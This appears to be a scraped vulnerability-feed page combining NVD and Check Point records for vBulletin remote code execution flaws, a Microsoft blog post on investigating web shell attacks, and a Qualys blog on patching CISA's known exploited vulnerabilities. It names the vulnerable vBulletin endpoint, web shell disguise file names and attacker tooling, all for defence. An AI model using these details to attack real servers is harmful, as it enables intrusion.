false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2022-10-26T13:58:00", "cpe": ["cpe:/a:vbulletin:vbulletin:5.6.2"], "id": "CVE-2020-17496", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17496", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.6.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:53:10", "description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. 
CVE-2020-17496 is the preferred CVE ID to track this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-30T17:15:00", "type": "cve", "title": "CVE-2020-7373", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496", "CVE-2020-7373"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/a:vbulletin:vbulletin:5.6.2"], "id": "CVE-2020-7373", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.6.2:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:18:54", "description": "A remote code execution vulnerability exists in vBulletin Forum. 
Successful exploitation of this vulnerability will allow remote attackers to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-25T00:00:00", "type": "checkpoint_advisories", "title": "vBulletin Forum Remote Code Execution (CVE-2019-16759; CVE-2020-17496)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2020-09-02T00:00:00", "id": "CPAI-2019-1100", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2020-02-06T16:48:38", "description": "Recently, an organization in the public sector discovered that one of their internet-facing servers was misconfigured and allowed attackers to upload a web shell, which let the adversaries gain a foothold for further compromise. 
The organization enlisted the services of Microsoft\u2019s Detection and Response Team (DART) to conduct a full incident response and remediate the threat before it could cause further damage.\n\nDART\u2019s investigation showed that the attackers uploaded a web shell in multiple folders on the web server, leading to the subsequent compromise of service accounts and domain admin accounts. This allowed the attackers to perform reconnaissance using _net.exe,_ scan for additional target systems using _nbtstat.exe_, and eventually move laterally using PsExec.\n\nThe attackers installed additional web shells on other systems, as well as a DLL backdoor on an Outlook Web Access (OWA) server. To persist on the server, the backdoor implant registered itself as a service or as an [Exchange transport agent](<https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help>), which allowed it to access and intercept all incoming and outgoing emails, exposing sensitive information. The backdoor also performed additional discovery activities as well as downloaded other malware payloads. In addition, the attackers sent special emails that the DLL backdoor interpreted as commands.\n\n\n\n_Figure 1. Sample web shell attack chain_\n\nThe case is one of increasingly more common incidents of web shell attacks affecting multiple organizations in various sectors. A web shell is a piece of malicious code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to provide remote access and code execution to server functions. 
Web shells allow adversaries to execute commands and to steal data from a web server or use the server as launch pad for further attacks against the affected organization.\n\nWith the use of web shells in cyberattacks on the rise, Microsoft\u2019s DART, the Microsoft Defender ATP Research Team, and the Microsoft Threat Intelligence Center (MSTIC) have been working together to investigate and closely monitor this threat.\n\n## Web shell attacks in the current threat landscape\n\nMultiple threat actors, including [ZINC](<https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/>), [KRYPTON](<https://www.microsoft.com/security/blog/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/>), and [GALLIUM](<https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/>), have been observed utilizing web shells in their campaigns. To implant web shells, adversaries take advantage of security gaps in internet-facing web servers, typically vulnerabilities in web applications, for example [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>) or [CVE-2019-16759](<https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/>).\n\nIn our investigations into these types of attacks, we have seen web shells within files that attempt to hide or blend in by using names commonly used for legitimate files in web servers, for example:\n\n * _index.aspx_\n * _fonts.aspx_\n * _css.aspx_\n * _global.aspx_\n * _default.php_\n * _function.php_\n * _Fileuploader.php_\n * _help.js_\n * _write.jsp_\n * _31.jsp_\n\nAmong web shells used by threat actors, the China Chopper web shell is one of the most widely used. 
One example is written in JSP:\n\n\n\nWe have seen this malicious JSP code within a specially crafted file uploaded to web servers:\n\n\n\n_Figure 2. Specially crafted image file with malicious JSP code_\n\nAnother China Chopper variant is written in PHP:\n\n\n\nMeanwhile, the KRYPTON group uses a bespoke web shell written in C# within an ASP.NET page:\n\n\n\n_Figure 3. Web shell written in C# within an ASP.NET page_\n\nOnce a web shell is successfully inserted into a web server, it can allow remote attackers to perform various tasks on the web server. Web shells can steal data, perpetrate watering hole attacks, and run other malicious commands for further compromise.\n\nWeb shell attacks have affected a wide range of industries. The organization in the public sector mentioned above represents one of the most common targeted sectors.\n\nAside from exploiting vulnerabilities in web applications or web servers, attackers take advantage of other weaknesses in internet-facing servers. These include the lack of the latest security updates, antivirus tools, network protection, proper security configuration, and informed security monitoring. Interestingly, we observed that attacks usually occur on weekends or during off-hours, when attacks are likely not immediately spotted and responded to.\n\nUnfortunately, these gaps appear to be widespread, given that every month, [Microsoft Defender Advanced Threat Protection (ATP)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) detects an average of 77,000 web shell and related artifacts on an average of 46,000 distinct machines.\n\n\n\n_Figure 3: Web shell encounters__ _\n\n## Detecting and mitigating web shell attacks\n\nBecause web shells are a multi-faceted threat, enterprises should build comprehensive defenses for multiple attack surfaces. 
[Microsoft Threat Protection](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides unified protection for identities, endpoints, email and data, apps, and infrastructure. Through signal-sharing across Microsoft services, customers can leverage Microsoft\u2019s industry-leading optics and security technologies to combat web shells and other threats.\n\nGaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. The installation of web shells can be detected by monitoring web application directories for web script file writes. Applications such as Outlook Web Access (OWA) rarely change after they have been installed and script writes to these application directories should be treated as suspicious.\n\nAfter installation, web shell activity can be detected by analyzing processes created by the Internet Information Services (IIS) process _w3wp.exe_. Sequences of processes that are associated with reconnaissance activity such as those identified in the alert screenshot (_net.exe_, _ping.exe_, _systeminfo.exe,_ and _hostname.exe_) should be treated with suspicion. Web applications such as OWA run from well-defined Application Pools. Any _cmd.exe_ process execution by _w3wp.exe_ running from an application pool that doesn\u2019t typically execute processes such as 'MSExchangeOWAAppPool' should be treated as unusual and regarded as potentially malicious.\n\n[Microsoft Defender ATP](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) exposes these behaviors that indicate web shell installation and post-compromise activity by analyzing script file writes and process executions. When alerted of these activities, security operations teams can then use the rich capabilities in Microsoft Defender ATP to investigate and resolve web shell attacks.\n\n\n\n\n\n_Figure 4. 
Sample Microsoft Defender ATP alerts related to web shell attacks_\n\n\n\n_Figure 5. Microsoft Defender ATP alert process tree_\n\nAs in most security issues, prevention is critical. Organizations can harden systems against web shell attacks by taking these preventive steps:\n\n * Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Deploy latest security updates as soon as they become available.\n * Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.\n * Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.\n * Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.\n * [Enable cloud-delivered protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) to get the latest defenses against new and emerging threats.\n * Educate end users about preventing malware infections. 
Encourage end users to practice good credential hygiene: limit the use of accounts with local or domain admin privileges.

**_Detection and Response Team (DART)_**

**_Microsoft Defender ATP Research Team_**

**_Microsoft Threat Intelligence Center (MSTIC)_**

The post [Ghost in the shell: Investigating web shell attacks](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>) appeared first on Microsoft Security.

## Managing CISA Known Exploited Vulnerabilities with Qualys VMDR

_(Qualys blog, published February 23, 2022.)_

_CISA released a directive in November 2021 recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._

### Situation

In November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.

The directive requires federal agencies to review and update their internal vulnerability management procedures so that each vulnerability is remediated according to the timelines in CISA's vulnerability catalog.

### Directive Scope

This CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.

However, CISA strongly recommends that public and private businesses, as well as state, local, tribal, and territorial (SLTT) governments, prioritize the mitigation of vulnerabilities listed in CISA's public catalog. This is vulnerability management guidance for all organizations to heed.

### CISA Catalog of Known Exploited Vulnerabilities

In total, CISA has posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA's most recent update was issued on February 22, 2022.

The Qualys Research team continuously maps the catalog's CVEs to the corresponding QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase and tags them with the RTI "CISA Exploited". This is an ongoing effort, since CISA frequently adds CVEs to the catalog through its regular feeds.

For these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by prioritizing remediation of the identified vulnerabilities.

CISA has ordered U.S. federal agencies to apply patches as soon as possible. CISA groups the remediation guidance into several categories based on attack surface severity and time-to-remediate; the timelines for each CVE are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).

### Detect CISA Vulnerabilities Using Qualys VMDR

Qualys helps customers identify and assess the risk to their organizations' digital infrastructure, and then automate remediation. Qualys' guidance for rapid response to Directive 22-01 follows.

The Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Because the directive covers 379 CVEs (as of February 22, 2022), we recommend searching with QQL (Qualys Query Language); the following query returns the QIDs Qualys has released for the catalog:

`vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"`

### CISA Exploited RTI

Using [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can prioritize these vulnerabilities with VMDR Prioritization. Qualys has introduced an **RTI category, CISA Exploited**.

This RTI indicates that a vulnerability is associated with the CISA catalog.

In addition, you can locate vulnerable hosts through Qualys Threat Protection by clicking on the impacted hosts to identify and track the vulnerability.

With the Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities, along with your remediation status and overall management, in real time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) dashboard.

### Detailed Operational Dashboard

### Remediation

To comply with this directive, federal agencies need to remediate all vulnerabilities within the remediation timelines given in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).

Qualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities in the CISA catalog are not currently supported out of the box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs on their list.

Customers can copy the following query into the Patch Management app to help comply with the aggressive remediation timelines set by CISA. Running this query for specific CVEs finds the required patches and allows quick and efficient deployment of the missing patches to all assets directly from within the Qualys Cloud Platform.

```
cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]
```

Vulnerabilities can be validated through VMDR, and a Patch Job can be configured for the vulnerable assets.

### Federal Enterprises and Agencies Can Act Now

For federal agencies and enterprises, it's a race against time to remediate these vulnerabilities across their environments and achieve compliance with this binding directive. Qualys solutions can help your organization achieve that compliance. The Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.

Here are a few steps federal entities can take immediately:

 * Run vulnerability assessments against all of your assets using our various sensors, such as the Qualys agent, scanners, and more
 * Prioritize remediation by due dates
 * Identify all vulnerable assets, automatically mapped into the threat feed
 * Use Qualys Patch Management to apply patches and other configuration changes
 * Track remediation progress through our Unified Dashboards

### Summary

Understanding which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats, all in a single unified solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help an organization of any size respond efficiently to CISA Binding Operational Directive 22-01.

#### Getting Started

Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).